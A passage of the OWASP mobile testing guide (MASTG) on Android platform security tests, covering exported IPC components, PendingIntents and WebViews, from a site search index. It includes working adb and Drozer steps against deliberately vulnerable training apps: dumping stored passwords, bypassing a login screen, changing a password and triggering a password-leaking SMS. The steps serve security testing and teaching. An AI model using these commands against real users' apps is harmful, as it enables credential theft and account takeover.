Remember that using the permission tag (android:permission
) will also limit other applications' access to a component. If your IPC is intended to be accessible to other applications, you can apply a security policy with the <permission>
element and set a proper android:protectionLevel
. When android:permission
is used in a service declaration, other applications must declare a corresponding <uses-permission>
element in their own manifest to start, stop, or bind to the service.
For more information about the content providers, please refer to the test case \"Testing Whether Stored Sensitive Data Is Exposed via IPC Mechanisms\" in chapter \"Testing Data Storage\".
Once you identify a list of IPC mechanisms, review the source code to see whether sensitive data is leaked when the mechanisms are used. For example, content providers can be used to access database information, and services can be probed to see if they return data. Broadcast receivers can leak sensitive information if probed or sniffed.
In the following, we use two example apps and give examples of identifying vulnerable IPC components:
In the \"Sieve\" app, we find three exported activities, identified by <activity>
:
<activity android:excludeFromRecents=\"true\" android:label=\"@string/app_name\" android:launchMode=\"singleTask\" android:name=\".MainLoginActivity\" android:windowSoftInputMode=\"adjustResize|stateVisible\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n</activity>\n<activity android:clearTaskOnLaunch=\"true\" android:excludeFromRecents=\"true\" android:exported=\"true\" android:finishOnTaskLaunch=\"true\" android:label=\"@string/title_activity_file_select\" android:name=\".FileSelectActivity\" />\n<activity android:clearTaskOnLaunch=\"true\" android:excludeFromRecents=\"true\" android:exported=\"true\" android:finishOnTaskLaunch=\"true\" android:label=\"@string/title_activity_pwlist\" android:name=\".PWList\" />\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code","title":"Inspect the Source Code","text":"By inspecting the PWList.java
activity, we see that it offers options to list all keys, add, delete, etc. If we invoke it directly, we will be able to bypass the LoginActivity. More on this can be found in the dynamic analysis below.
In the \"Sieve\" app, we find two exported services, identified by <service>
:
<service android:exported=\"true\" android:name=\".AuthService\" android:process=\":remote\" />\n<service android:exported=\"true\" android:name=\".CryptoService\" android:process=\":remote\" />\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code_1","title":"Inspect the Source Code","text":"Check the source code for the class android.app.Service
:
By reversing the target application, we can see that the service AuthService
provides functionality for changing the password and PIN-protecting the target app.
public void handleMessage(Message msg) {\n AuthService.this.responseHandler = msg.replyTo;\n Bundle returnBundle = msg.obj;\n int responseCode;\n int returnVal;\n switch (msg.what) {\n ...\n case AuthService.MSG_SET /*6345*/:\n if (msg.arg1 == AuthService.TYPE_KEY) /*7452*/ {\n responseCode = 42;\n if (AuthService.this.setKey(returnBundle.getString(\"com.mwr.example.sieve.PASSWORD\"))) {\n returnVal = 0;\n } else {\n returnVal = 1;\n }\n } else if (msg.arg1 == AuthService.TYPE_PIN) {\n responseCode = 41;\n if (AuthService.this.setPin(returnBundle.getString(\"com.mwr.example.sieve.PIN\"))) {\n returnVal = 0;\n } else {\n returnVal = 1;\n }\n } else {\n sendUnrecognisedMessage();\n return;\n }\n }\n }\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#broadcast-receivers","title":"Broadcast Receivers","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-androidmanifest_2","title":"Inspect the AndroidManifest","text":"In the \"Android Insecure Bank\" app, we find a broadcast receiver in the manifest, identified by <receiver>
:
<receiver android:exported=\"true\" android:name=\"com.android.insecurebankv2.MyBroadCastReceiver\">\n <intent-filter>\n <action android:name=\"theBroadcast\" />\n </intent-filter>\n</receiver>\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code_2","title":"Inspect the Source Code","text":"Search the source code for strings like sendBroadcast
, sendOrderedBroadcast
, and sendStickyBroadcast
. Make sure that the application doesn't send any sensitive data.
If an Intent is broadcasted and received within the application only, LocalBroadcastManager
can be used to prevent other apps from receiving the broadcast message. This reduces the risk of leaking sensitive information.
To understand more about what the receiver is intended to do, we have to go deeper in our static analysis and search for usage of the class android.content.BroadcastReceiver
and the Context.registerReceiver
method, which is used to dynamically create receivers.
The following extract of the target application's source code shows that the broadcast receiver triggers transmission of an SMS message containing the user's decrypted password.
public class MyBroadCastReceiver extends BroadcastReceiver {\n String usernameBase64ByteString;\n public static final String MYPREFS = \"mySharedPreferences\";\n\n @Override\n public void onReceive(Context context, Intent intent) {\n // TODO Auto-generated method stub\n\n String phn = intent.getStringExtra(\"phonenumber\");\n String newpass = intent.getStringExtra(\"newpass\");\n\n if (phn != null) {\n try {\n SharedPreferences settings = context.getSharedPreferences(MYPREFS, Context.MODE_WORLD_READABLE);\n final String username = settings.getString(\"EncryptedUsername\", null);\n byte[] usernameBase64Byte = Base64.decode(username, Base64.DEFAULT);\n usernameBase64ByteString = new String(usernameBase64Byte, \"UTF-8\");\n final String password = settings.getString(\"superSecurePassword\", null);\n CryptoClass crypt = new CryptoClass();\n String decryptedPassword = crypt.aesDeccryptedString(password);\n String textPhoneno = phn.toString();\n String textMessage = \"Updated Password from: \"+decryptedPassword+\" to: \"+newpass;\n SmsManager smsManager = SmsManager.getDefault();\n System.out.println(\"For the changepassword - phonenumber: \"+textPhoneno+\" password is: \"+textMessage);\nsmsManager.sendTextMessage(textPhoneno, null, textMessage, null, null);\n }\n }\n }\n}\n
BroadcastReceivers should use the android:permission
attribute; otherwise, other applications can invoke them. You can use Context.sendBroadcast(intent, receiverPermission);
to specify permissions a receiver must have to read the broadcast. You can also set an explicit application package name that limits the components this Intent will resolve to. If left as the default value (null), all components in all applications will be considered. If non-null, the Intent can match only the components in the given application package.
You can enumerate IPC components with MobSF. To list all exported IPC components, upload the APK file and the components collection will be displayed in the following screen:
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#content-providers","title":"Content Providers","text":"The \"Sieve\" application implements a vulnerable content provider. To list the content providers exported by the Sieve app, execute the following command:
$ adb shell dumpsys package com.mwr.example.sieve | grep -Po \"Provider{[\\w\\d\\s\\./]+}\" | sort -u\nProvider{34a20d5 com.mwr.example.sieve/.FileBackupProvider}\nProvider{64f10ea com.mwr.example.sieve/.DBContentProvider}\n
Once identified, you can use jadx to reverse engineer the app and analyze the source code of the exported content providers to identify potential vulnerabilities.
To identify the corresponding class of a content provider, use the following information:
com.mwr.example.sieve
.DBContentProvider
.When analyzing the class com.mwr.example.sieve.DBContentProvider
, you'll see that it contains several URIs:
package com.mwr.example.sieve;\n...\npublic class DBContentProvider extends ContentProvider {\n public static final Uri KEYS_URI = Uri.parse(\"content://com.mwr.example.sieve.DBContentProvider/Keys\");\n public static final Uri PASSWORDS_URI = Uri.parse(\"content://com.mwr.example.sieve.DBContentProvider/Passwords\");\n...\n}\n
Use the following commands to call the content provider using the identified URIs:
$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/\nRow: 0 Password=1234567890AZERTYUIOPazertyuiop, pin=1234\n\n$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/\nRow: 0 _id=1, service=test, username=test, password=BLOB, email=t@tedt.com\nRow: 1 _id=2, service=bank, username=owasp, password=BLOB, email=user@tedt.com\n\n$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection email:username:password --where 'service=\\\"bank\\\"'\nRow: 0 email=user@tedt.com, username=owasp, password=BLOB\n
You are able now to retrieve all database entries (see all lines starting with \"Row:\" in the output).
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#activities_1","title":"Activities","text":"To list activities exported by an application, you can use the following command and focus on activity
elements:
$ aapt d xmltree sieve.apk AndroidManifest.xml\n...\nE: activity (line=32)\n A: android:label(0x01010001)=@0x7f05000f\n A: android:name(0x01010003)=\".FileSelectActivity\" (Raw: \".FileSelectActivity\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\nE: activity (line=40)\n A: android:label(0x01010001)=@0x7f050000\n A: android:name(0x01010003)=\".MainLoginActivity\" (Raw: \".MainLoginActivity\")\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\n A: android:launchMode(0x0101001d)=(type 0x10)0x2\n A: android:windowSoftInputMode(0x0101022b)=(type 0x11)0x14\n E: intent-filter (line=46)\n E: action (line=47)\n A: android:name(0x01010003)=\"android.intent.action.MAIN\" (Raw: \"android.intent.action.MAIN\")\n E: category (line=49)\n A: android:name(0x01010003)=\"android.intent.category.LAUNCHER\" (Raw: \"android.intent.category.LAUNCHER\")\nE: activity (line=52)\n A: android:label(0x01010001)=@0x7f050009\n A: android:name(0x01010003)=\".PWList\" (Raw: \".PWList\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\nE: activity (line=60)\n A: android:label(0x01010001)=@0x7f05000a\n A: android:name(0x01010003)=\".SettingsActivity\" (Raw: \".SettingsActivity\")\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\n...\n
You can identify an exported activity using one of the following properties:
intent-filter
sub declaration.android:exported
to 0xffffffff
.You can also use jadx to identify exported activities in the file AndroidManifest.xml
using the criteria described above:
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.mwr.example.sieve\">\n...\n <!-- This activity is exported via the attribute \"exported\" -->\n <activity android:name=\".FileSelectActivity\" android:exported=\"true\" />\n <!-- This activity is exported via the \"intent-filter\" declaration -->\n <activity android:name=\".MainLoginActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\"/>\n <category android:name=\"android.intent.category.LAUNCHER\"/>\n </intent-filter>\n </activity>\n <!-- This activity is exported via the attribute \"exported\" -->\n <activity android:name=\".PWList\" android:exported=\"true\" />\n <!-- Activities below are not exported -->\n <activity android:name=\".SettingsActivity\" />\n <activity android:name=\".AddEntryActivity\"/>\n <activity android:name=\".ShortLoginActivity\" />\n <activity android:name=\".WelcomeActivity\" />\n <activity android:name=\".PINActivity\" />\n...\n</manifest>\n
Enumerating activities in the vulnerable password manager \"Sieve\" shows that the following activities are exported:
.MainLoginActivity
.PWList
.FileSelectActivity
Use the command below to launch an activity:
# Start the activity without specifying an action or an category\n$ adb shell am start -n com.mwr.example.sieve/.PWList\nStarting: Intent { cmp=com.mwr.example.sieve/.PWList }\n\n# Start the activity indicating an action (-a) and an category (-c)\n$ adb shell am start -n \"com.mwr.example.sieve/.MainLoginActivity\" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER\nStarting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.mwr.example.sieve/.MainLoginActivity }\n
Since the activity .PWList
is called directly in this example, you can use it to bypass the login form protecting the password manager, and access the data contained within the password manager.
Services can be enumerated with the Drozer module app.service.info
:
dz> run app.service.info -a com.mwr.example.sieve\nPackage: com.mwr.example.sieve\n com.mwr.example.sieve.AuthService\n Permission: null\n com.mwr.example.sieve.CryptoService\n Permission: null\n
To communicate with a service, you must first use static analysis to identify the required inputs.
Because this service is exported, you can use the module app.service.send
to communicate with the service and change the password stored in the target application:
dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 6345 7452 1 --extra string com.mwr.example.sieve.PASSWORD \"abcdabcdabcdabcd\" --bundle-as-obj\nGot a reply from com.mwr.example.sieve/com.mwr.example.sieve.AuthService:\n what: 4\n arg1: 42\n arg2: 0\n Empty\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#broadcast-receivers_1","title":"Broadcast Receivers","text":"To list broadcast receivers exported by an application, you can use the following command and focus on receiver
elements:
$ aapt d xmltree InsecureBankv2.apk AndroidManifest.xml\n...\nE: receiver (line=88)\n A: android:name(0x01010003)=\"com.android.insecurebankv2.MyBroadCastReceiver\" (Raw: \"com.android.insecurebankv2.MyBroadCastReceiver\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n E: intent-filter (line=91)\n E: action (line=92)\n A: android:name(0x01010003)=\"theBroadcast\" (Raw: \"theBroadcast\")\nE: receiver (line=119)\n A: android:name(0x01010003)=\"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\" (Raw: \"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\")\n A: android:exported(0x01010010)=(type 0x12)0x0\n E: intent-filter (line=122)\n E: action (line=123)\n A: android:name(0x01010003)=\"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\" (Raw: \"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\")\n...\n
You can identify an exported broadcast receiver using one of the following properties:
intent-filter
sub declaration.android:exported
set to 0xffffffff
.You can also use jadx to identify exported broadcast receivers in the file AndroidManifest.xml
using the criteria described above:
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.android.insecurebankv2\">\n...\n <!-- This broadcast receiver is exported via the attribute \"exported\" as well as the \"intent-filter\" declaration -->\n <receiver android:name=\"com.android.insecurebankv2.MyBroadCastReceiver\" android:exported=\"true\">\n <intent-filter>\n <action android:name=\"theBroadcast\"/>\n </intent-filter>\n </receiver>\n <!-- This broadcast receiver is NOT exported because the attribute \"exported\" is explicitly set to false -->\n <receiver android:name=\"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\" android:exported=\"false\">\n <intent-filter>\n <action android:name=\"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\"/>\n </intent-filter>\n </receiver>\n...\n</manifest>\n
The above example from the vulnerable banking application InsecureBankv2 shows that only the broadcast receiver named com.android.insecurebankv2.MyBroadCastReceiver
is exported.
Now that you know that there is an exported broadcast receiver, you can dive deeper and reverse engineer the app using jadx. This will allow you to analyze the source code searching for potential vulnerabilities that you could later try to exploit. The source code of the exported broadcast receiver is the following:
package com.android.insecurebankv2;\n...\npublic class MyBroadCastReceiver extends BroadcastReceiver {\n public static final String MYPREFS = \"mySharedPreferences\";\n String usernameBase64ByteString;\n\n public void onReceive(Context context, Intent intent) {\n String phn = intent.getStringExtra(\"phonenumber\");\n String newpass = intent.getStringExtra(\"newpass\");\n if (phn != null) {\n try {\n SharedPreferences settings = context.getSharedPreferences(\"mySharedPreferences\", 1);\n this.usernameBase64ByteString = new String(Base64.decode(settings.getString(\"EncryptedUsername\", (String) null), 0), \"UTF-8\");\n String decryptedPassword = new CryptoClass().aesDeccryptedString(settings.getString(\"superSecurePassword\", (String) null));\n String textPhoneno = phn.toString();\n String textMessage = \"Updated Password from: \" + decryptedPassword + \" to: \" + newpass;\n SmsManager smsManager = SmsManager.getDefault();\n System.out.println(\"For the changepassword - phonenumber: \" + textPhoneno + \" password is: \" + textMessage);\n smsManager.sendTextMessage(textPhoneno, (String) null, textMessage, (PendingIntent) null, (PendingIntent) null);\n } catch (Exception e) {\n e.printStackTrace();\n }\n } else {\n System.out.println(\"Phone number is null\");\n }\n }\n}\n
As you can see in the source code, this broadcast receiver expects two parameters named phonenumber
and newpass
. With this information you can now try to exploit this broadcast receiver by sending events to it using custom values:
# Send an event with the following properties:\n# Action is set to \"theBroadcast\"\n# Parameter \"phonenumber\" is set to the string \"07123456789\"\n# Parameter \"newpass\" is set to the string \"12345\"\n$ adb shell am broadcast -a theBroadcast --es phonenumber \"07123456789\" --es newpass \"12345\"\nBroadcasting: Intent { act=theBroadcast flg=0x400000 (has extras) }\nBroadcast completed: result=0\n
This generates the following SMS:
Updated Password from: SecretPassword@ to: 12345\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#sniffing-intents","title":"Sniffing Intents","text":"If an Android application broadcasts intents without setting a required permission or specifying the destination package, the intents can be monitored by any application that runs on the device.
To register a broadcast receiver to sniff intents, use the Drozer module app.broadcast.sniff
and specify the action to monitor with the --action
parameter:
dz> run app.broadcast.sniff --action theBroadcast\n[*] Broadcast receiver registered to sniff matching intents\n[*] Output is updated once a second. Press Control+C to exit.\n\nAction: theBroadcast\nRaw: Intent { act=theBroadcast flg=0x10 (has extras) }\nExtra: phonenumber=07123456789 (java.lang.String)\nExtra: newpass=12345 (java.lang.String)`\n
You can also use the following command to sniff the intents. However, the content of the extras passed will not be displayed:
$ adb shell dumpsys activity broadcasts | grep \"theBroadcast\"\nBroadcastRecord{fc2f46f u0 theBroadcast} to user 0\nIntent { act=theBroadcast flg=0x400010 (has extras) }\nBroadcastRecord{7d4f24d u0 theBroadcast} to user 0\nIntent { act=theBroadcast flg=0x400010 (has extras) }\n45: act=theBroadcast flg=0x400010 (has extras)\n46: act=theBroadcast flg=0x400010 (has extras)\n121: act=theBroadcast flg=0x400010 (has extras)\n144: act=theBroadcast flg=0x400010 (has extras)\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/","title":"Testing for Vulnerable Implementation of PendingIntent","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#overview","title":"Overview","text":"When testing Pending Intents you must ensure that they are immutable and that the app explicitly specifies the exact package, action, and component that will receive the base intent.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#static-analysis","title":"Static Analysis","text":"To identify vulnerable implementations, static analysis can be performed by looking for API calls used for obtaining a PendingIntent
. Such APIs are listed below:
PendingIntent getActivity(Context, int, Intent, int)\nPendingIntent getActivity(Context, int, Intent, int, Bundle)\nPendingIntent getActivities(Context, int, Intent, int, Bundle)\nPendingIntent getActivities(Context, int, Intent, int)\nPendingIntent getForegroundService(Context, int, Intent, int)\nPendingIntent getService(Context, int, Intent, int)\n
Once any of the above function is spotted, check the implementation of the base intent and the PendingIntent
for the security pitfalls listed in the Pending Intents section.
For example, in A-156959408(CVE-2020-0389), the base intent is implicit and also the PendingIntent
is mutable, thus making it exploitable.
private Notification createSaveNotification(Uri uri) {\n Intent viewIntent = new Intent(Intent.ACTION_VIEW)\n .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_GRANT_READ_URI_PERMISSION)\n .setDataAndType(uri, \"video/mp4\"); //Implicit Intent\n\n//... skip ...\n\n\nNotification.Builder builder = new Notification.Builder(this, CHANNEL_ID)\n .setSmallIcon(R.drawable.ic_android)\n .setContentTitle(getResources().getString(R.string.screenrecord_name))\n .setContentText(getResources().getString(R.string.screenrecord_save_message))\n .setContentIntent(PendingIntent.getActivity(\n this,\n REQUEST_CODE,\n viewIntent,\n Intent.FLAG_GRANT_READ_URI_PERMISSION)) // Mutable PendingIntent.\n .addAction(shareAction)\n .addAction(deleteAction)\n .setAutoCancel(true);\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#dynamic-analysis","title":"Dynamic Analysis","text":"Frida can be used to hook the APIs used to get a PendingIntent
. This information can be used to determine the code location of the call, which can be further used to perform static analysis as described above.
Here's an example of such a Frida script that can be used to hook the PendingIntent.getActivity
function:
var pendingIntent = Java.use('android.app.PendingIntent');\n\nvar getActivity_1 = pendingIntent.getActivity.overload(\"android.content.Context\", \"int\", \"android.content.Intent\", \"int\");\n\ngetActivity_1.implementation = function(context, requestCode, intent, flags){\n console.log(\"[*] Calling PendingIntent.getActivity(\"+intent.getAction()+\")\");\n console.log(\"\\t[-] Base Intent toString: \" + intent.toString());\n console.log(\"\\t[-] Base Intent getExtras: \" + intent.getExtras());\n console.log(\"\\t[-] Base Intent getFlags: \" + intent.getFlags());\n return this.getActivity(context, requestCode, intent, flags);\n}\n
This approach can be helpful when dealing with applications with large code bases, where determining the control flow can sometimes be tricky.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/","title":"Testing JavaScript Execution in WebViews","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#overview","title":"Overview","text":"To test for JavaScript execution in WebViews check the app for WebView usage and evaluate whether or not each WebView should allow JavaScript execution. If JavaScript execution is required for the app to function normally, then you need to ensure that the app follows all the best practices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#static-analysis","title":"Static Analysis","text":"To create and use a WebView, an app must create an instance of the WebView
class.
WebView webview = new WebView(this);\nsetContentView(webview);\nwebview.loadUrl(\"https://www.owasp.org/\");\n
Various settings can be applied to the WebView (activating/deactivating JavaScript is one example). JavaScript is disabled by default for WebViews and must be explicitly enabled. Look for the method setJavaScriptEnabled
to check for JavaScript activation.
webview.getSettings().setJavaScriptEnabled(true);\n
This allows the WebView to interpret JavaScript. It should be enabled only if necessary to reduce the attack surface to the app. If JavaScript is necessary, you should make sure that
To remove all JavaScript source code and locally stored data, clear the WebView's cache with clearCache
when the app closes.
Devices running platforms older than Android 4.4 (API level 19) use a version of WebKit that has several security issues. As a workaround, the app must confirm that WebView objects display only trusted content if the app runs on these devices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#dynamic-analysis","title":"Dynamic Analysis","text":"Dynamic Analysis depends on operating conditions. There are several ways to inject JavaScript into an app's WebView:
To address these attack vectors, check the following:
Only files that are in the app data directory should be rendered in a WebView (see test case \"Testing for Local File Inclusion in WebViews\").
The HTTPS communication must be implemented according to best practices to avoid MITM attacks. This means:
To test for WebView protocol handlers check the app for WebView usage and evaluate whether or not the WebView should have resource access. If resource access is necessary you need to verify that it's implemented following best practices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0032/#static-analysis","title":"Static Analysis","text":"Check the source code for WebView usage. The following WebView settings control resource access:
setAllowContentAccess
: Content URL access allows WebViews to load content from a content provider installed on the system, which is enabled by default .setAllowFileAccess
: Enables and disables file access within a WebView. The default value is true
when targeting Android 10 (API level 29) and below and false
for Android 11 (API level 30) and above. Note that this enables and disables file system access only. Asset and resource access is unaffected and accessible via file:///android_asset
and file:///android_res
.setAllowFileAccessFromFileURLs
: Does or does not allow JavaScript running in the context of a file scheme URL to access content from other file scheme URLs. The default value is true
for Android 4.0.3 - 4.0.4 (API level 15) and below and false
for Android 4.1 (API level 16) and above.setAllowUniversalAccessFromFileURLs
: Does or does not allow JavaScript running in the context of a file scheme URL to access content from any origin. The default value is true
for Android 4.0.3 - 4.0.4 (API level 15) and below and false
for Android 4.1 (API level 16) and above.If one or more of the above methods is/are activated, you should determine whether the method(s) is/are really necessary for the app to work properly.
If a WebView instance can be identified, find out whether local files are loaded with the loadURL
method.
WebView = new WebView(this);\nwebView.loadUrl(\"file:///android_asset/filename.html\");\n
The location from which the HTML file is loaded must be verified. If the file is loaded from external storage, for example, the file is readable and writable by everyone. This is considered a bad practice. Instead, the file should be placed in the app's assets directory.
webview.loadUrl(\"file:///\" +\nEnvironment.getExternalStorageDirectory().getPath() +\n\"filename.html\");\n
The URL specified in loadURL
should be checked for dynamic parameters that can be manipulated; their manipulation may lead to local file inclusion.
Use the following code snippet and best practices to deactivate protocol handlers, if applicable:
//If attackers can inject script into a WebView, they could access local resources. This can be prevented by disabling local file system access, which is enabled by default. You can use the Android WebSettings class to disable local file system access via the public method `setAllowFileAccess`.\nwebView.getSettings().setAllowFileAccess(false);\n\nwebView.getSettings().setAllowFileAccessFromFileURLs(false);\n\nwebView.getSettings().setAllowUniversalAccessFromFileURLs(false);\n\nwebView.getSettings().setAllowContentAccess(false);\n
To identify the usage of protocol handlers, look for ways to trigger phone calls and ways to access files from the file system while you're using the app.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/","title":"Testing for Java Objects Exposed Through WebViews","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/#overview","title":"Overview","text":"To test for Java objects exposed through WebViews check the app for WebViews having JavaScript enabled and determine whether the WebView is creating any JavaScript interfaces aka. \"JavaScript Bridges\". Finally, check whether an attacker could potentially inject malicious JavaScript code.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/#static-analysis","title":"Static Analysis","text":"The following example shows how addJavascriptInterface
is used to bridge a Java Object and JavaScript in a WebView:
WebView webview = new WebView(this);\nWebSettings webSettings = webview.getSettings();\nwebSettings.setJavaScriptEnabled(true);\n\nMSTG_ENV_008_JS_Interface jsInterface = new MSTG_ENV_008_JS_Interface(this);\n\nmyWebView.addJavascriptInterface(jsInterface, \"Android\");\nmyWebView.loadURL(\"http://example.com/file.html\");\nsetContentView(myWebView);\n
In Android 4.2 (API level 17) and above, an annotation @JavascriptInterface
explicitly allows JavaScript to access a Java method.
public class MSTG_ENV_008_JS_Interface {\n\n Context mContext;\n\n /** Instantiate the interface and set the context */\n MSTG_ENV_005_JS_Interface(Context c) {\n mContext = c;\n }\n\n @JavascriptInterface\n public String returnString () {\n return \"Secret String\";\n }\n\n /** Show a toast from the web page */\n @JavascriptInterface\n public void showToast(String toast) {\n Toast.makeText(mContext, toast, Toast.LENGTH_SHORT).show();\n }\n}\n
This is how you can call the method returnString
from JavaScript, the string \"Secret String\" will be stored in the variable result
:
var result = window.Android.returnString();\n
With access to the JavaScript code, via, for example, stored XSS or a MITM attack, an attacker can directly call the exposed Java methods.
If addJavascriptInterface
is necessary, take the following considerations:
WebView.getUrl
).<uses-sdk android:minSdkVersion=\"17\" />
).Dynamic analysis of the app can show you which HTML or JavaScript files are loaded and which vulnerabilities are present. The procedure for exploiting the vulnerability starts with producing a JavaScript payload and injecting it into the file that the app is requesting. The injection can be accomplished via a MITM attack or direct modification of the file if it is stored in external storage. The whole process can be accomplished via Drozer and weasel (MWR's advanced exploitation payload), which can install a full agent, injecting a limited agent into a running process or connecting a reverse shell as a Remote Access Tool (RAT).
A full description of the attack is included in the blog article \"WebView addJavascriptInterface Remote Code Execution\".
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/","title":"Testing for Overlay Attacks","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/#overview","title":"Overview","text":"To test for overlay attacks you need to check the app for usage of certain APIs and attributes typically used to protect against overlay attacks as well as check the Android version that the app is targeting.
To mitigate these attacks please carefully read the general guidelines about Android View security in the Android Developer Documentation. For instance, the so-called touch filtering is a common defense against tapjacking, which contributes to safeguarding users against these vulnerabilities, usually in combination with other techniques and considerations as we introduce in this section.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/#static-analysis","title":"Static Analysis","text":"To start your static analysis you can check the app for the following methods and attributes (non-exhaustive list):
onFilterTouchEventForSecurity
for more fine-grained control and to implement a custom security policy for views.android:filterTouchesWhenObscured
to true or call setFilterTouchesWhenObscured
.Some attributes might affect the app as a whole, while others can be applied to specific components. The latter would be the case when, for example, there is a business need to specifically allow overlays while wanting to protect sensitive input UI elements. The developers might also take additional precautions to confirm the user's actual intent which might be legitimate and tell it apart from a potential attack.
As a final note, always remember to properly check the API level that the app is targeting and the implications that this has. For instance, Android 8.0 (API level 26) introduced changes to apps requiring SYSTEM_ALERT_WINDOW
(\"draw on top\"). From this API level on, apps using TYPE_APPLICATION_OVERLAY
will be always shown above other windows having other types such as TYPE_SYSTEM_OVERLAY
or TYPE_SYSTEM_ALERT
. You can use this information to ensure that no overlay attacks may occur at least for this app in this concrete Android version.
Abusing this kind of vulnerability in a dynamic manner can be pretty challenging and very specialized as it closely depends on the target Android version. For instance, for versions up to Android 7.0 (API level 24) you can use the following APKs as a proof of concept to identify the existence of the vulnerabilities.
To test for WebViews cleanup you should inspect all APIs related to WebView data deletion and try to fully track the data deletion process.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0037/#static-analysis","title":"Static Analysis","text":"Start by identifying the usage of the following WebView APIs and carefully validate the mentioned best practices.
Initialization: an app might be initializing the WebView in a way to avoid storing certain information by using setDomStorageEnabled
, setAppCacheEnabled
or setDatabaseEnabled
from android.webkit.WebSettings
. The DOM Storage (for using the HTML5 local storage), Application Caches and Database Storage APIs are disabled by default, but apps might set these settings explicitly to \"true\".
Cache: Android's WebView class offers the clearCache
method which can be used to clear the cache for all WebViews used by the app. It receives a boolean input parameter (includeDiskFiles
) which will wipe all stored resource including the RAM cache. However if it's set to false, it will only clear the RAM cache. Check the app for usage of the clearCache
method and verify its input parameter. Additionally, you may also check if the app is overriding onRenderProcessUnresponsive
for the case when the WebView might become unresponsive, as the clearCache
method might also be called from there.
WebStorage APIs: WebStorage.deleteAllData
can be also used to clear all storage currently being used by the JavaScript storage APIs, including the Web SQL Database and the HTML5 Web Storage APIs.
Some apps will need to enable the DOM storage in order to display some HTML5 sites that use local storage. This should be carefully investigated as this might contain sensitive data.
Cookies: any existing cookies can be deleted by using CookieManager.removeAllCookies.
File APIs: proper data deletion in certain directories might not be that straightforward, some apps use a pragmatic solution which is to manually delete selected directories known to hold user data. This can be done using the java.io.File
API such as java.io.File.deleteRecursively
.
Example:
This example in Kotlin from the open source Firefox Focus app shows different cleanup steps:
